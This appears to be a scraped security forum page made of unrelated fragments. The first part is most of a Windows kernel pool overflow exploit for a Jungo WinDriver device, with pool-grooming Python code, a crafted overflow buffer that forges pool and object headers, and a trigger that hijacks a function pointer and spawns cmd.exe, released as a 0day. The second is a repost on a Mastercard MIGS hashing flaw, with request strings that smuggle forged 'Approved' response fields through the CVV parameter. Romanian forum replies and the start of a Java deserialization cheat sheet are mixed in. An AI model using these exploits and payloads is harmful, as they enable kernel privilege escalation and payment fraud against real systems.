kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Allocated) IoCo (Protected) <--- chunk first allocated in the page 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)
Creating Holes
The ‘IoCo’ tag is representative of a IoCompletionReserve object and a ‘Even’ tag is representative of an Event object. Notice that our first chunks offset is 0x60, thats the offset we will start freeing from. So if we free groups of objects, that is, the IoCompletionReserve and the Event our calculation becomes:
>>> "0x%x" % (0x7 * 0xa0) '0x460' >>>
We will end up with the correct size. Let’s take a quick look at what it looks like if we free the next 7 IoCompletionReserve object’s only.
kd> !pool 85d1f000 Pool page 85d1f000 region is Nonpaged pool *85d1f000 size: 60 previous size: 0 (Allocated) *IoCo (Protected) Owning component : Unknown (update pooltag.txt) 85d1f060 size: 60 previous size: 60 (Free) IoCo 85d1f0c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f100 size: 60 previous size: 40 (Free) IoCo 85d1f160 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f1a0 size: 60 previous size: 40 (Free) IoCo 85d1f200 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f240 size: 60 previous size: 40 (Free) IoCo 85d1f2a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f2e0 size: 60 previous size: 40 (Free) IoCo 85d1f340 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f380 size: 60 previous size: 40 (Free) IoCo 85d1f3e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f420 size: 60 previous size: 40 (Free) IoCo 85d1f480 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f4c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f520 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f560 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f5c0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f600 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f660 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f6a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f700 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f740 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f7a0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f7e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f840 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f880 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f8e0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f920 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1f980 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1f9c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fa20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fa60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fac0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fb00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fb60 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fba0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fc00 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fc40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fca0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fce0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fd40 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fd80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fde0 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fe20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1fe80 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1fec0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ff20 size: 40 previous size: 60 (Allocated) Even (Protected) 85d1ff60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 85d1ffc0 size: 40 previous size: 60 (Allocated) Even (Protected)
So we can see we have seperate freed chunks. But we want to coalesce them into a single 0x460 freed chunk. To achieve this, we need to set the
offset
for our chunks to 0x60 (The first pointing to 0xXXXXY060).bin = [] # object sizes CreateEvent_size = 0x40 IoCompletionReserve_size = 0x60 combined_size = CreateEvent_size + IoCompletionReserve_size # after the 0x20 chunk hole, the first object will be the IoCompletionReserve object offset = IoCompletionReserve_size for i in range(offset, offset + (7 * combined_size), combined_size): try: # chunks need to be next to each other for the coalesce to take effect bin.append(khandlesd[obj + i]) bin.append(khandlesd[obj + i - IoCompletionReserve_size]) except KeyError: pass # make sure it's contiguously allocated memory if len(tuple(bin)) == 14: holes.append(tuple(bin)) # make the holes to fill for hole in holes: for handle in hole: kernel32.CloseHandle(handle)
Now, when we run the freeing function, we punch holes into the pool and get a freed chunk of our target size.
kd> !pool 8674e000 Pool page 8674e000 region is Nonpaged pool *8674e000 size: 460 previous size: 0 (Free) *Io <-- 0x460 chunk is free Pooltag Io : general IO allocations, Binary : nt!io 8674e460 size: 60 previous size: 460 (Allocated) IoCo (Protected) 8674e4c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e500 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e560 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e5a0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e600 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e640 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e6a0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e6e0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e740 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e780 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e7e0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e820 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e880 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e8c0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e920 size: 40 previous size: 60 (Allocated) Even (Protected) 8674e960 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674e9c0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ea00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ea60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eaa0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eb00 size: 40 previous size: 60 (Allocated) Even (Protected) 8674eb40 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eba0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ebe0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ec40 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ec80 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ece0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ed20 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ed80 size: 40 previous size: 60 (Allocated) Even (Protected) 8674edc0 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ee20 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ee60 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674eec0 size: 40 previous size: 60 (Allocated) Even (Protected) 8674ef00 size: 60 previous size: 40 (Allocated) IoCo (Protected) 8674ef60 size: 40 previous size: 60 (Allocated) Even (Protected) 8674efa0 size: 60 previous size: 40 (Allocated) IoCo (Protected)
We can see that the freed chunks have been coalesced and now we have a perfect sized hole. All we need to do is allocate and overwrite.
def we_can_trigger_the_pool_overflow(): """ This triggers the pool overflow vulnerability using a buffer of size 0x460. """ GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 OPEN_EXISTING = 0x3 DEVICE_NAME = "\\\\.\\WinDrvr1240" dwReturn = c_ulong() driver_handle = kernel32.CreateFileA(DEVICE_NAME, GENERIC_READ | GENERIC_WRITE, 0, None, OPEN_EXISTING, 0, None) inputbuffer = 0x41414141 inputbuffer_size = 0x5000 outputbuffer_size = 0x5000 outputbuffer = 0x20000000 alloc_pool_overflow_buffer(inputbuffer, inputbuffer_size) IoStatusBlock = c_ulong() if driver_handle: dev_ioctl = ntdll.ZwDeviceIoControlFile(driver_handle, None, None, None, byref(IoStatusBlock), 0x953824b7, inputbuffer, inputbuffer_size, outputbuffer, outputbuffer_size) return True return False
Surviving the Overflow
You may have noticed the null dword in the exploit at offset 0x90 within the buffer.
def alloc_pool_overflow_buffer(base, input_size): """ Craft our special buffer to trigger the overflow. """ print "(+) allocating pool overflow input buffer" baseadd = c_int(base) size = c_int(input_size) input = "\x41" * 0x18 # offset to size input += struct.pack("<I", 0x0000008d) # controlled size (this triggers the overflow) input += "\x42" * (0x90-len(input)) # padding to survive bsod input += struct.pack("<I", 0x00000000) # use a NULL dword for sub_4196CA input += "\x43" * ((0x460-0x8)-len(input)) # fill our pool buffer
This is needed to survive the overflow and avoid any further processing. The following code listing is executed directly after the copy loop.
.text:004199ED loc_4199ED: ; CODE XREF: sub_41998E+41 .text:004199ED push 9 .text:004199EF pop ecx .text:004199F0 lea eax, [ebx+90h] ; controlled from the copy .text:004199F6 push eax ; void * .text:004199F7 lea esi, [edx+6Ch] ; controlled offset .text:004199FA lea eax, [edx+90h] ; controlled offset .text:00419A00 lea edi, [ebx+6Ch] ; controlled from copy .text:00419A03 rep movsd .text:00419A05 push eax ; int .text:00419A06 call sub_4196CA ; call sub_4196CA
The important point is that the code will call sub_4196CA. Also note that @eax becomes our buffer +0x90 (0x004199FA). Let’s take a look at that function call.
.text:004196CA sub_4196CA proc near ; CODE XREF: sub_4195A6+1E .text:004196CA ; sub_41998E+78 ... .text:004196CA .text:004196CA arg_0 = dword ptr 8 .text:004196CA arg_4 = dword ptr 0Ch .text:004196CA .text:004196CA push ebp .text:004196CB mov ebp, esp .text:004196CD push ebx .text:004196CE mov ebx, [ebp+arg_4] .text:004196D1 push edi .text:004196D2 push 3C8h ; size_t .text:004196D7 push 0 ; int .text:004196D9 push ebx ; void * .text:004196DA call memset .text:004196DF mov edi, [ebp+arg_0] ; controlled buffer .text:004196E2 xor edx, edx .text:004196E4 add esp, 0Ch .text:004196E7 mov [ebp+arg_4], edx .text:004196EA mov eax, [edi] ; make sure @eax is null .text:004196EC mov [ebx], eax ; the write here is fine .text:004196EE test eax, eax .text:004196F0 jz loc_4197CB ; take the jump
The code gets a dword value from our SystemBuffer at +0x90, writes to our overflowed buffer and then tests it for null. If it’s null, we can avoid further processing in this function and return.
.text:004197CB loc_4197CB: ; CODE XREF: sub_4196CA+26 .text:004197CB pop edi .text:004197CC pop ebx .text:004197CD pop ebp .text:004197CE retn 8
If we don’t do this, we will likley BSOD when attempting to access non-existant pointers from our buffer within this function (we could probably survive this anyway).
Now we can return cleanly and trigger the eop without any issues. For the shellcode cleanup, our overflown buffer is stored in @esi, so we can calculate the offset to the TypeIndex and patch it up. Finally, smashing the ObjectCreateInfo with null is fine because the system will just avoid using that pointer.
Crafting Our Buffer
Since the loop copies 0x8 bytes on every iteration and since the starting index is 0x1c:
.text:004199D3 lea ecx, [ebx+1Ch] ; index offset for the first write
We can do our overflow calculation like so. Let’s say we want to overflow the buffer by 44 bytes (0x2c). We take the buffer size, subtract the header, subtract the starting index offset, add the amount of bytes we want to overflow and divide it all by 0x8 (due to the qword copy per loop iteration).
(0x460 - 0x8 - 0x1c + 0x2c) / 0x8 = 0x8d
So a size of 0x8d will overflow the buffer by 0x2c or 44 bytes. This smashes the pool header, quota and object header.
# repair the allocated chunk header... input += struct.pack("<I", 0x040c008c) # _POOL_HEADER input += struct.pack("<I", 0xef436f49) # _POOL_HEADER (PoolTag) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x0000005c) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER_QUOTA_INFO input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (PointerCount) input += struct.pack("<I", 0x00000001) # _OBJECT_HEADER (HandleCount) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (Lock) input += struct.pack("<I", 0x00080000) # _OBJECT_HEADER (TypeIndex) input += struct.pack("<I", 0x00000000) # _OBJECT_HEADER (ObjectCreateInfo)
We can see that we set the TypeIndex to 0x00080000 (actually it’s the lower word) to null. This means that that the function table will point to 0x0 and conveniently enough, we can map the null page.
kd> dd nt!ObTypeIndexTable L2 82b7dee0 00000000 bad0b0b0
Note that the second index is 0xbad0b0b0. I get a funny feeling I can use this same technique on x64 as well :->
Triggering Code Execution in the Kernel
Well, we survive execution after triggering our overflow, but in order to gain eop we need to set a pointer to 0x00000074 to leverage the OkayToCloseProcedure function pointer.
kd> dt nt!_OBJECT_TYPE name 84fc8040 +0x008 Name : _UNICODE_STRING "IoCompletionReserve" kd> dt nt!_OBJECT_TYPE 84fc8040 . +0x000 TypeList : [ 0x84fc8040 - 0x84fc8040 ] +0x000 Flink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ] +0x004 Blink : 0x84fc8040 _LIST_ENTRY [ 0x84fc8040 - 0x84fc8040 ] +0x008 Name : "IoCompletionReserve" +0x000 Length : 0x26 +0x002 MaximumLength : 0x28 +0x004 Buffer : 0x88c01090 "IoCompletionReserve" +0x010 DefaultObject : +0x014 Index : 0x0 '' <--- TypeIndex is 0x0 +0x018 TotalNumberOfObjects : 0x61a9 +0x01c TotalNumberOfHandles : 0x61a9 +0x020 HighWaterNumberOfObjects : 0x61a9 +0x024 HighWaterNumberOfHandles : 0x61a9 +0x028 TypeInfo : <-- TypeInfo is offset 0x28 from 0x0 +0x000 Length : 0x50 +0x002 ObjectTypeFlags : 0x2 '' +0x002 CaseInsensitive : 0y0 +0x002 UnnamedObjectsOnly : 0y1 +0x002 UseDefaultObject : 0y0 +0x002 SecurityRequired : 0y0 +0x002 MaintainHandleCount : 0y0 +0x002 MaintainTypeList : 0y0 +0x002 SupportsObjectCallbacks : 0y0 +0x002 CacheAligned : 0y0 +0x004 ObjectTypeCode : 0 +0x008 InvalidAttributes : 0xb0 +0x00c GenericMapping : _GENERIC_MAPPING +0x01c ValidAccessMask : 0xf0003 +0x020 RetainAccess : 0 +0x024 PoolType : 0 ( NonPagedPool ) +0x028 DefaultPagedPoolCharge : 0 +0x02c DefaultNonPagedPoolCharge : 0x5c +0x030 DumpProcedure : (null) +0x034 OpenProcedure : (null) +0x038 CloseProcedure : (null) +0x03c DeleteProcedure : (null) +0x040 ParseProcedure : (null) +0x044 SecurityProcedure : 0x82cb02ac long nt!SeDefaultObjectMethod+0 +0x048 QueryNameProcedure : (null) +0x04c OkayToCloseProcedure : (null) <--- OkayToCloseProcedure is offset 0x4c from 0x0 +0x078 TypeLock : +0x000 Locked : 0y0 +0x000 Waiting : 0y0 +0x000 Waking : 0y0 +0x000 MultipleShared : 0y0 +0x000 Shared : 0y0000000000000000000000000000 (0) +0x000 Value : 0 +0x000 Ptr : (null) +0x07c Key : 0x6f436f49 +0x080 CallbackList : [ 0x84fc80c0 - 0x84fc80c0 ] +0x000 Flink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ] +0x004 Blink : 0x84fc80c0 _LIST_ENTRY [ 0x84fc80c0 - 0x84fc80c0 ]
So, 0x28 + 0x4c = 0x74, which is the location of where our pointer needs to be. But how is the OkayToCloseProcedure called? Turns out, that this is a registered aexit handler. So to trigger the execution of code, one just needs to free the corrupted IoCompletionReserve. We don’t know which handle is associated with the overflown chunk, so we just free them all.
def trigger_lpe(): """ This function frees the IoCompletionReserve objects and this triggers the registered aexit, which is our controlled pointer to OkayToCloseProcedure. """ # free the corrupted chunk to trigger OkayToCloseProcedure for k, v in khandlesd.iteritems(): kernel32.CloseHandle(v) os.system("cmd.exe")
Obligatory, full sized screenshot:
Timeline
- 2017-08-22 – Verified and sent to Jungo via {sales,first,security,info}@jungo.com.
- 2017-08-25 – No response from Jungo and two bounced emails.
- 2017-08-26 – Attempted a follow up with the vendor via website chat.
- 2017-08-26 – No response via the website chat.
- 2017-09-03 – Recieved an email from a Jungo representative stating that they are “looking into it”.
- 2017-09-03 – Requested an timeframe for patch development and warned of possible 0day release.
- 2017-09-06 – No response from Jungo.
- 2017-09-06 – Public 0day release of advisory.
Some people ask how long it takes me to develop exploits. Honestly, since the kernel is new to me, it took me a little longer than normal. For vulnerability analysis and exploitation of this bug, it took me 1.5 days (over the weekend) which is relatively slow for an older platform.
Conclusion
Any size chunk that is < 0x1000 can be exploited in this manner. As mentioned, this is not a new technique, but merely a variation to an already existing technique that I wouldn’t have discovered if I stuck to exploiting HEVD. Having said that, the ability to take a pre-existing vulnerable driver and develop exploitation techniques from it proves to be invaluable.
Kernel pool determinimism is strong, simply because if you randomize more of the kernel, then the operating system takes a performance hit. The balance between security and performance has always been problematic and it isn’t always so clear unless you are dealing directly with the kernel.
References
https://github.com/hacksysteam/HackSysExtremeVulnerableDriver
http://www.fuzzysecurity.com/tutorials/expDev/20.html
https://media.blackhat.com/bh-dc-11/Mandt/BlackHat_DC_2011_Mandt_kernelpool-Slides.pdf
https://msdn.microsoft.com/en-us/library/windows/desktop/ms724485(v=vs.85).aspx
https://www.exploit-db.com/exploits/34272Shoutout’s to beef, sicky, ryujin, skylined and bee13oy for the help! Here, you can find the advisory and the exploit.
-
Da, e penibil.
-
Eh, sunt multi non-alumni care pot sa scrie.
-
Mastercard Internet Gateway Service: Hashing Design Flaw
Last year I found a design error in the MD5 version of the hashing method used by Mastercard Internet Gateway Service. The flaw allows modification of transaction amount. They have awarded me with a bounty for reporting it. This year, they have switched to HMAC-SHA256, but this one also has a flaw (and no response from MasterCard).
If you just want to know what the bug is, just skip to the Flaw part.
What is MIGS?
When you pay on a website, the website owner usually just connects their system to an intermediate payment gateway (you will be forwarded to another website). This payment gateway then connects to several payments system available in a country. For credit card payment, many gateways will connect to another gateway (one of them is MIGS) which works with many banks to provide 3DSecure service.
How does it work?
The payment flow is usually like this if you use MIGS:
- You select items from an online store (merchant)
- You enter your credit card number on the website
- The card number, amount, etc is then signed and returned to the browser which will auto POST to intermediate payment gateway
- The intermediate payment gateway will convert the format to the one requested by MIGS, sign it (with MIGS key), and return it to the browser. Again this will auto POST, this time to MIGS server.
- If 3D secure not requested, then go to step 6. If 3D secure is requested, MIGS will redirect the request to the bank that issues the card, the bank will ask for an OTP, and then it will generate HTML that will auto POST data to MIGS
- MIGS will return a signed data to the browser, and will auto POST the data back to the intermediate Gateway
- Intermediate Gateway will check if the data is valid or not based on the signature. If it is not valid, then error page will be generated
- Based on MIGS response, payment gateway will forward the status to the merchant
Notice that instead of communicating directly between servers, communications are done via user’s browser, but everything is signed. In theory, if the signing process and verification process is correct then everything will be fine. Unfortunately, this is not always the case.
Flaw in the MIGS MD5 Hashing
This bug is extremely simple. The hashing method used is:
MD5(Secret + Data)
But it was not vulnerable to hash length extension attack (some checks were done to prevent this). The data is created like this: for every query parameter that starts with vpc_, sort it, then concatenate the values only, without delimiter. For example, if we have this data:
Name: Joe Amount: 10000 Card: 1234567890123456
vpc_Name=Joe&Vpc_Amount=10000&vpc_Card=1234567890123456
Sort it:
vpc_Amount=10000 vpc_Card=1234567890123456 vpc_Name=Joe
Get the values, and concatenate it:
100001234567890123456Joe
Note that if I change the parameters:
vpc_Name=Joe&Vpc_Amount=1&vpc_Card=1234567890123456&vpc_B=0000
Sort it:
vpc_Amount=1 vpc_B=0000 vpc_Card=1234567890123456 vpc_Name=Joe
Get the values, and concatenate it:
100001234567890123456Joe
The MD5 value is still the same. So basically, when the data is being sent to MIGS, we can just insert additional parameter after the amount to eat the last digits, or to the front to eat the first digits, the amount will be slashed, and you can pay a 2000 USD MacBook with 2 USD.
Intermediate gateways and merchant can work around this bug by always checking that the amount returned by MIGS is indeed the same as the amount requested.
MasterCard rewarded me with 8500 USD for this bug.
Flaw in the HMAC-SHA256 Hashing
The new HMAC-SHA256 has a flaw that can be exploited if we can inject invalid values to intermediate payment gateways. I have tested that at least one payment gateway (Fusion Payments) have this bug. I was rewarded 500 USD from Fusion Payments. It may affect other Payment gateways that connect to MIGS.
In the new version, they have added delimiters (&) between fields, added field names and not just values, and used HMAC-SHA256. For the same data above, the hashed data is:
Vpc_Amount=10000&vpc_Card=1234567890123456&vpc_Name=Joe
We can’t shift anything, everything should be fine. But what happens if a value contains & or = or other special characters?
Reading this documentation, it says that:
Note: The values in all name value pairs should NOT be URL encoded for the purpose of hashing.
The “NOT” is my emphasis. It means that if we have these fields:
Amount=100 Card=1234 CVV=555
It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)
And if we have this (amount contains the & and =)
Amount=100&Card=1234 CVV=555
It will be hashed as: HMAC(Amount=100&Card=1234&CVV=555)
The same as before. Still not really a problem at this point.
Of course, I thought that may be the documentation is wrong, may be it should be encoded. But I have checked the behavior of the MIGS server, and the behavior is as documented. May be they don’t want to deal with different encodings (such as + instead of %20).
There doesn’t seem to be any problem with that, any invalid values will be checked by MIGS and will cause an error (for example invalid amount above will be rejected).
But I noticed that in several payment gateways, instead of validating inputs on their server side, they just sign everything it and give it to MIGS. It’s much easier to do just JavaScript checking on the client side, sign the data on the server side, and let MIGS decide whether the card number is correct or not, or should the CVV be 3 or 4 digits, is the expiration date correct, etc. The logic is: MIGS will recheck the inputs, and will do it better.
On Fusion Payments, I found out that it is exactly what happened: they allow any characters of any length to be sent for the CVV (only checked in JavaScript), they will sign the request and send it to MIGS.
Exploit
To exploit this we need to construct a string which will be a valid request, and also a valid MIGS server response. We don’t need to contact MIGS server at all, we are forcing the client to sign a valid data for themselves.
A basic request looks like this:
vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
and a basic response from the server will look like this:
vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
In the Fusion Payment’s case, the exploit is done by injecting vpc_CardSecurityCode (CVV)
vpc_AccessCode=9E33F6D7&vpc_Amount=25&vpc_Card=Visa&vpc_CardExp=1717&vpc_CardNum=4599777788889999&vpc_CardSecurityCode=999%26vpc_Message%3DApproved%26vpc_OrderInfo%3DORDERINFO%26vpc_ReceiptNo%3D722819658213%26vpc_TransactionNo%3D2000834062%26vpc_TxnResponseCode%3D0%26vpc_Z%3Da&vpc_OrderInfo=ORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
The client/payment gateway will generate the correct hash for this string
Now we can post this data back to the client itself (without ever going to MIGS server), but we change it slightly so that the client will read the correct variables (most client will only check forvpc_TxnResponseCode, and vpc_TransactionNo):
vpc_AccessCode=9E33F6D7%26vpc_Amount%3D25%26vpc_Card%3DVisa%26vpc_CardExp%3D1717%26vpc_CardNum%3D4599777788889999%26vpc_CardSecurityCode%3D999&vpc_Message=Approved&vpc_OrderInfo=ORDERINFO&vpc_ReceiptNo=722819658213&vpc_TransactionNo=2000834062&vpc_TxnResponseCode=0&vpc_Z=a%26vpc_OrderInfo%3DORDERINFO&vpc_SecureHash=THEHASH&vpc_SecureHashType=SHA256
Note that:
- This will be hashed the same as the previous data
- The client will ignore vpc_AccessCode and the value inside it
- The client will process the vpc_TxnResponseCode, etc and assume the transaction is valid
It can be said that this is a MIGS client bug, but the hashing method chosen by MasterCard allows this to happen, had the value been encoded, this bug will not be possible.
Response from MIGS
MasterCard did not respond to this bug in the HMAC-SHA256. When reporting I have CC-ed it to several persons that handled the previous bug. None of the emails bounced. Not even a “we are checking this” email from them. They also have my Facebook in case they need to contact me (this is from the interaction about the MD5 bug).
Some people are sneaky and will try to deny that they have received a bug report, so now when reporting a bug, I put it in a password protected post (that is why you can see several password-protected posts in this blog). So far at least 3 views from MasterCard IP address (3 views that enter the password). They have to type in a password to read the report, so it is impossible for them to accidentally click it without reading it. I have nagged them every week for a reply.
My expectation was that they would try to warn everyone connecting to their system to check and filter for injections.
Flaws In Payment Gateways
As an extra note: even though payment gateways handle money, they are not as secure as people think. During my pentests I found several flaws in the design of the payment protocol on several intermediate gateways. Unfortunately, I can’t go into detail on this one(when I say “pentests”, it means something under NDA).
I also found flaws in the implementation. For example Hash Length Extension Attack, XML signature verification error, etc. One of the simplest bugs that I found is in Fusion Payments. The first bug that I found was: they didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success).
So basically we can just enter any credit card number, got a failed response from MIGS, change it, and suddenly payment is successful. This is a 20 million USD company, and I got 400 USD for this bug. This is not the first payment gateway that had this flaw, during my pentest I found this exact bug in another payment gateway. Despite the relatively low amount of bounty, Fusion Payments is currently the only payment gateway that I contacted that is very clear in their bug bounty program, and is very quick in responding my emails and fixing their bugs.
Conclusion
Payment gateways are not as secure as you think. With the relatively low bounty (and in several cases that I have reported: 0 USD), I am wondering how many people already exploited bugs in payment gateways.
Sursa: http://tinyhack.com/2017/09/05/mastercard-internet-gateway-service-hashing-design-flaw/
-
Super, au trecut doar doua luni si ceva de la ultimul post.
-
Java-Deserialization-Cheat-Sheet
A cheat sheet for pentesters and researchers about deserialization vulnerabilities in various Java (JVM) serialization libraries.
Please, use #javadeser hash tag for tweets.
Table of content
- Java Native Serialization (binary)
- XMLEncoder (XML)
- XStream (XML/JSON/various)
- Kryo (binary)
- Hessian/Burlap (binary/XML)
- Castor (XML)
- json-io (JSON)
- Jackson (JSON)
- Red5 IO AMF (AMF)
- Apache Flex BlazeDS (AMF)
- Flamingo AMF (AMF)
- GraniteDS (AMF)
- WebORB for Java (AMF)
- SnakeYAML (YAML)
- jYAML (YAML)
- YamlBeans (YAML)
- "Safe" deserialization
Java Native Serialization (binary)
Overview
Main talks & presentations & docs
Marshalling Pickles
Exploiting Deserialization Vulnerabilities in Java
Serial Killer: Silently Pwning Your Java Endpoints
by @pwntester & @cschneider4711
Deserialize My Shorts: Or How I Learned To Start Worrying and Hate Java Object Deserialization
Surviving the Java serialization apocalypse
by @cschneider4711 & @pwntester
